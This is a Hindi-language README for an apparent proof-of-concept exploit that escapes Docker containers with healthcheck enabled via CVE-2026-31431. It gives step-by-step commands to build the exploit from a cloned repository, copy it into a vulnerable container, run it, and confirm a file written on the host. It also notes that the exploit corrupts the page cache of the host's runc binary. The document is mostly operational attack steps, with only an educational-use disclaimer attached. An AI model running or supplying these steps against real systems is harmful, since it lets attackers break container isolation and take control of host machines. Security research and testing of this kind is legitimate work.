
किसी भी डॉकर कंटेनर पर कंटेनर एस्केप, जिसमें healthcheck सक्षम है, CVE-2026-31431 के माध्यम से
https://github.com/user-attachments/assets/2cb0cb67-789a-4461-a0b8-1fe878d9426e
इस रिपॉज़िटरी में, एक संवेदनशील कंटेनर सेट करने के लिए docker-compose.yml प्रदान किया गया है। आप किसी अन्य संवेदनशील कंटेनर का उपयोग कर सकते हैं या अपना खुद का सेट कर सकते हैं, लेकिन एक्सप्लॉइट कोड को तदनुसार बदलना याद रखें।
# होस्ट मशीन पर
rm -r copy-fail-c /tmp/pwned
docker-compose up -d
git clone https://github.com/tgies/copy-fail-c.git
cp payload.c copy-fail-c/
cd copy-fail-c && make && cp exploit ../ && cd ..
docker cp exp.sh copyfail:/tmp/
docker cp exploit copyfail:/tmp/
docker exec -it copyfail /bin/sh
# copyfail कंटेनर के अंदर
cd /tmp
chmod +x exp.sh exploit
./exp.sh
# हेल्थचेक चलने के लिए कुछ मिनट प्रतीक्षा करें
# और जाँचें कि होस्ट पर /tmp/pwned बन गया है या नहीं
# होस्ट मशीन पर
ls /tmp/pwned
एक्सप्लॉइट सफल होने के बाद, होस्ट मशीन पर runc बाइनरी का पेजकैश दूषित हो जाता है। आप होस्ट पर echo 3 | sudo tee /proc/sys/vm/drop_caches चलाकर इसे पुनर्स्थापित कर सकते हैं।
यह रिपॉज़िटरी केवल शैक्षिक उद्देश्यों के लिए है। इसका उपयोग किसी भी दुर्भावनापूर्ण गतिविधि के लिए नहीं किया जाना चाहिए। इस कोड के दुरुपयोग से होने वाली किसी भी क्षति के लिए लेखक जिम्मेदार नहीं है। इसका उपयोग हमेशा नियंत्रित और कानूनी वातावरण में करें।